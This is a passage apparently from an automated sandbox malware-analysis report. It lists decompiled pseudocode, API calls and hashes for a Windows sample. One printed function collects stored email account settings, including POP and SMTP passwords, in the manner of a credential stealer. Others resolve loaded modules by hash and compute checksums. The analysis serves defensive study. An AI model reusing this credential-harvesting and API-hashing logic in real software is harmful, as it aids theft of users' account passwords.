                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                        • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                        • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                        • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405924(WCHAR* _a4, WCHAR* _a8) {
                        				WCHAR* _t4;
                        				void* _t5;
                        
                        				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                        				_t4 = StrStrW(_a4, _a8); // executed
                        				return _t4;
                        			}





                        0x00405932
                        0x0040593d
                        0x00405940

                        APIs
                        • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                        • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                        • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                        • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0040438F
                        • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                        • VariantInit.OLEAUT32(?), ref: 004043C4
                        • SysAllocString.OLEAUT32(?), ref: 004043CD
                        • VariantInit.OLEAUT32(?), ref: 00404414
                        • SysAllocString.OLEAUT32(?), ref: 00404419
                        • VariantInit.OLEAUT32(?), ref: 00404431
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: InitVariant$AllocString$CreateInitializeInstance
                        • String ID:
                        • API String ID: 1312198159-0
                        • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                        • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                        • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                        • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                        				signed int _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				intOrPtr _v44;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t40;
                        				intOrPtr _t45;
                        				intOrPtr _t47;
                        				void* _t71;
                        				void* _t75;
                        				void* _t77;
                        
                        				_t72 = _a4;
                        				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                        				_t81 = _t71;
                        				if(_t71 != 0) {
                        					_push(__ebx);
                        					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                        					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                        					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                        					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                        					_v8 = _v8 & 0x00000000;
                        					_v20 = _t40;
                        					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                        					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                        					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                        					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                        					_v12 = _v12 & 0x00000000;
                        					_v32 = _t45;
                        					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                        					_t77 = _t75 + 0x50;
                        					_v36 = _t47;
                        					if(_v8 != 0 || _v12 != 0) {
                        						E00405872( *0x49f934, _t71, 1, 0);
                        						E00405872( *0x49f934, _t67, 1, 0);
                        						_t74 = _v16;
                        						E00405872( *0x49f934, _v16, 1, 0);
                        						E00405781( *0x49f934, _v40);
                        						E00405872( *0x49f934, _v20, 1, 0);
                        						_push(_v8);
                        						E00405762(_v16,  *0x49f934, _v24);
                        						E00405872( *0x49f934, _v28, 1, 0);
                        						E00405781( *0x49f934, _v44);
                        						E00405872( *0x49f934, _v32, 1, 0);
                        						_push(_v12);
                        						E00405762(_t74,  *0x49f934, _v36);
                        						_t77 = _t77 + 0x88;
                        					} else {
                        						_t74 = _v16;
                        					}
                        					E0040471C(_t71);
                        					E0040471C(_t67);
                        					E0040471C(_t74);
                        					E0040471C(_v20);
                        					E0040471C(_v24);
                        					E0040471C(_v28);
                        					E0040471C(_v32);
                        					E0040471C(_v36);
                        				}
                        				return 1;
                        			}





















                        0x0040d070
                        0x0040d080
                        0x0040d084
                        0x0040d086
                        0x0040d08c
                        0x0040d0a0
                        0x0040d0ae
                        0x0040d0bd
                        0x0040d0c0
                        0x0040d0c5
                        0x0040d0c9
                        0x0040d0e3
                        0x0040d0f2
                        0x0040d101
                        0x0040d104
                        0x0040d109
                        0x0040d110
                        0x0040d11e
                        0x0040d123
                        0x0040d126
                        0x0040d12d
                        0x0040d145
                        0x0040d154
                        0x0040d15a
                        0x0040d166
                        0x0040d174
                        0x0040d186
                        0x0040d18e
                        0x0040d19a
                        0x0040d1ac
                        0x0040d1ba
                        0x0040d1cc
                        0x0040d1d1
                        0x0040d1dd
                        0x0040d1e2
                        0x0040d1e7
                        0x0040d1e7
                        0x0040d1e7
                        0x0040d1eb
                        0x0040d1f1
                        0x0040d1f7
                        0x0040d1ff
                        0x0040d207
                        0x0040d20f
                        0x0040d217
                        0x0040d21f
                        0x0040d227
                        0x0040d230

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                        • API String ID: 0-2111798378
                        • Opcode ID: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
                        • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                        • Opcode Fuzzy Hash: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
                        • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040549C(signed int _a4, signed int* _a8) {
                        				signed int* _t46;
                        				void* _t47;
                        				signed int* _t48;
                        				signed int* _t49;
                        				signed int* _t50;
                        				signed int* _t51;
                        				signed int* _t52;
                        				signed int* _t53;
                        				signed int* _t55;
                        				signed int* _t57;
                        				signed int _t59;
                        				signed int _t61;
                        				signed int _t62;
                        				unsigned int _t64;
                        				signed int _t77;
                        				signed int _t79;
                        				signed int _t81;
                        				signed int _t95;
                        				signed int _t97;
                        				signed int _t98;
                        				signed int _t100;
                        				signed int _t102;
                        				signed char* _t124;
                        
                        				_t124 = _a4;
                        				_t59 =  *_t124 & 0x000000ff;
                        				if(_t59 >= 0) {
                        					_t57 = _a8;
                        					_t57[1] = _t57[1] & 0x00000000;
                        					 *_t57 = _t59;
                        					return 1;
                        				}
                        				_t95 = _t124[1] & 0x000000ff;
                        				if(_t95 >= 0) {
                        					_t55 = _a8;
                        					_t55[1] = _t55[1] & 0x00000000;
                        					 *_t55 = (_t59 & 0x0000007f) << 0x00000007 | _t95;
                        					return 2;
                        				}
                        				_t61 = _t59 << 0x0000000e | _t124[2] & 0x000000ff;
                        				if(_t61 < 0) {
                        					_t97 = _t95 << 0x0000000e | _t124[3] & 0x000000ff;
                        					_t62 = _t61 & 0x001fc07f;
                        					if(_t97 < 0) {
                        						_t98 = _t97 & 0x001fc07f;
                        						_t77 = _t62 << 0x0000000e | _t124[4] & 0x000000ff;
                        						if(_t77 < 0) {
                        							_t64 = _t62 << 0x00000007 | _t98;
                        							_t100 = _t98 << 0x0000000e | _t124[5] & 0x000000ff;
                        							if(_t100 < 0) {
                        								_t79 = _t77 << 0x0000000e | _t124[6] & 0x000000ff;
                        								if(_t79 < 0) {
                        									_t102 = _t100 << 0x0000000e | _t124[7] & 0x000000ff;
                        									_t81 = (_t79 & 0x001fc07f) << 7;
                        									if(_t102 < 0) {
                        										_t46 = _a8;
                        										 *_t46 = (_t102 & 0x001fc07f | _t81) << 0x00000008 | _t124[8] & 0x000000ff;
                        										_t46[1] = (_t124[4] & 0x000000ff) >> 0x00000003 & 0x0000000f | _t64 << 0x00000004;
                        										_t47 = 9;
                        									} else {
                        										_t48 = _a8;
                        										 *_t48 = _t102 & 0xf01fc07f | _t81;
                        										_t48[1] = _t64 >> 4;
                        										_t47 = 8;
                        									}
                        								} else {
                        									_t49 = _a8;
                        									 *_t49 = (_t100 << 0x00000007 ^ _t79) & 0x0fe03f80 ^ _t79;
                        									_t49[1] = _t64 >> 0xb;
                        									_t47 = 7;
                        								}
                        							} else {
                        								_t50 = _a8;
                        								_a4 = (_t77 & 0x001fc07f) << 0x00000007 | _t100;
                        								 *_t50 = _a4;
                        								_t50[1] = _t64 >> 0x12;
                        								_t47 = 6;
                        							}
                        						} else {
                        							_t51 = _a8;
                        							 *_t51 = _t98 << 0x00000007 | _t77;
                        							_t51[1] = _t62 >> 0x12;
                        							_t47 = 5;
                        						}
                        					} else {
                        						_t52 = _a8;
                        						_t52[1] = _t52[1] & 0x00000000;
                        						 *_t52 = _t97 & 0x001fc07f | _t62 << 0x00000007;
                        						_t47 = 4;
                        					}
                        					return _t47;
                        				} else {
                        					_t53 = _a8;
                        					_t53[1] = _t53[1] & 0x00000000;
                        					 *_t53 = (_t95 & 0x0000007f) << 0x00000007 | _t61 & 0x001fc07f;
                        					return 3;
                        				}
                        			}


























                        0x004054a1
                        0x004054a4
                        0x004054a9
                        0x004054ab
                        0x004054ae
                        0x004054b2
                        0x00000000
                        0x004054b4
                        0x004054bb
                        0x004054c1
                        0x004054c3
                        0x004054ce
                        0x004054d2
                        0x00000000
                        0x004054d4
                        0x004054e2
                        0x004054e6
                        0x00405513
                        0x00405515
                        0x00405519
                        0x0040553b
                        0x0040553d
                        0x00405541
                        0x00405565
                        0x0040556a
                        0x0040556e
                        0x0040559a
                        0x0040559e
                        0x004055c9
                        0x004055cb
                        0x004055d0
                        0x0040560d
                        0x00405610
                        0x00405612
                        0x00405615
                        0x004055d2
                        0x004055d2
                        0x004055e4
                        0x004055e6
                        0x004055e9
                        0x004055e9
                        0x004055a0
                        0x004055a0
                        0x004055b7
                        0x004055b9
                        0x004055bc
                        0x004055bc
                        0x00405570
                        0x00405570
                        0x0040557d
                        0x00405587
                        0x00405589
                        0x0040558c
                        0x0040558c
                        0x00405543
                        0x00405543
                        0x00405552
                        0x00405554
                        0x00405557
                        0x00405557
                        0x0040551b
                        0x0040551b
                        0x00405525
                        0x00405529
                        0x0040552b
                        0x0040552b
                        0x00000000
                        0x004054e8
                        0x004054e8
                        0x004054f9
                        0x004054fd
                        0x00000000
                        0x004054ff

                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                        • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                        • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                        • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E004029D4(signed int _a28, signed int _a36, unsigned int _a40) {
                        				signed int _t26;
                        				signed int _t27;
                        				signed int _t28;
                        				signed int _t39;
                        				signed int _t47;
                        				unsigned int _t69;
                        				unsigned int _t70;
                        				signed int _t71;
                        				signed int _t73;
                        				signed int _t75;
                        				signed int* _t76;
                        
                        				asm("pushad");
                        				_t75 = _a36;
                        				_t69 = _a40;
                        				_t26 = 0;
                        				if(_t75 != 0) {
                        					_t27 = 0xffffffffffffffff;
                        					if(_t69 != 0) {
                        						while((_t75 & 0x00000003) != 0) {
                        							_t47 = _t27 ^  *_t75;
                        							_t75 = _t75 + 1;
                        							_t27 = _t47 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t47) * 4);
                        							_t69 = _t69 - 1;
                        							if(_t69 != 0) {
                        								continue;
                        							}
                        							break;
                        						}
                        						_t73 = _t69 & 0x00000007;
                        						_t70 = _t69 >> 3;
                        						while(_t70 != 0) {
                        							_t76 = _t75 + 4;
                        							_t39 = ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4))) * 4) ^  *_t76;
                        							_t75 =  &(_t76[1]);
                        							_t27 = (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4))) * 4);
                        							_t70 = _t70 - 1;
                        						}
                        						_t71 = _t73;
                        						if(_t71 != 0) {
                        							do {
                        								_t28 = _t27 ^  *_t75;
                        								_t75 = _t75 + 1;
                        								_t27 = _t28 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t28) * 4);
                        								_t71 = _t71 - 1;
                        							} while (_t71 != 0);
                        						}
                        					}
                        					_t26 =  !_t27;
                        				}
                        				_a28 = _t26;
                        				asm("popad");
                        				return _t26;
                        			}














                        0x004029d4
                        0x004029d5
                        0x004029d9
                        0x004029e2
                        0x004029e6
                        0x004029ec
                        0x004029f1
                        0x004029f7
                        0x004029ff
                        0x00402a01
                        0x00402a0c
                        0x00402a0f
                        0x00402a10
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402a10
                        0x00402a14
                        0x00402a17
                        0x00402a1a
                        0x00402a1e
                        0x00402a55
                        0x00402a57
                        0x00402a8b
                        0x00402a8e
                        0x00402a8e
                        0x00402a91
                        0x00402a95
                        0x00402a97
                        0x00402a97
                        0x00402a99
                        0x00402aa4
                        0x00402aa7
                        0x00402aa7
                        0x00402a97
                        0x00402a95
                        0x00402aaa
                        0x00402aaa
                        0x00402aac
                        0x00402ab0
                        0x00402ab1

                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                        • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                        • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                        • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E0040317B(intOrPtr _a4) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				void* __ecx;
                        				intOrPtr _t17;
                        				void* _t21;
                        				intOrPtr* _t23;
                        				void* _t26;
                        				void* _t28;
                        				intOrPtr* _t31;
                        				void* _t33;
                        				signed int _t34;
                        
                        				_push(_t25);
                        				_t1 =  &_v8;
                        				 *_t1 = _v8 & 0x00000000;
                        				_t34 =  *_t1;
                        				_v8 =  *[fs:0x30];
                        				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                        				_t31 = _t23;
                        				do {
                        					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                        					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                        					_pop(_t26);
                        					_t35 = _t28;
                        					if(_t28 == 0) {
                        						goto L3;
                        					} else {
                        						E004032EA(_t35, _t28, 0);
                        						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                        						_t33 = _t33 + 0x14;
                        						if(_a4 == _t21) {
                        							_t17 = _v12;
                        						} else {
                        							goto L3;
                        						}
                        					}
                        					L5:
                        					return _t17;
                        					L3:
                        					_t31 =  *_t31;
                        				} while (_t23 != _t31);
                        				_t17 = 0;
                        				goto L5;
                        			}














                        0x0040317f
                        0x00403180
                        0x00403180
                        0x00403180
                        0x0040318d
                        0x00403196
                        0x00403199
                        0x0040319b
                        0x004031a1
                        0x004031a9
                        0x004031ab
                        0x004031ac
                        0x004031ae
                        0x00000000
                        0x004031b0
                        0x004031b3
                        0x004031c2
                        0x004031c7
                        0x004031cd
                        0x004031e0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004031cd
                        0x004031d7
                        0x004031dd
                        0x004031cf
                        0x004031cf
                        0x004031d1
                        0x004031d5
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                        • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                        • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                        • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                        Uniqueness

                        Uniqueness Score: -1.00%